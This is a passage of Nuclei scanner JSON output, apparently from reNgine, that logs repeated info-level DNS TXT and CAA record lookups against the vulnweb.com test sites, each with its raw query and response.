server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 29545\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 29545\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3599\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.223627891Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 38964\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 38964\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3599\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.224158584Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 35355\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 35355\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.228066495Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 6392\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 6392\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.228401219Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 51937\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 51937\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.228429815Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 44035\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 44035\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.228507094Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 4219\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 4219\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.22868898Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 10437\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 10437\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.22936668Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 48285\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 48285\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.229489986Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 52041\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 52041\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.232020822Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 18087\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 18087\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.235105365Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 35735\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 35735\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.235485567Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 53113\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 53113\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.235650548Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 29006\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 29006\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.235783385Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 50644\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 50644\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.236260229Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 12269\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 12269\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 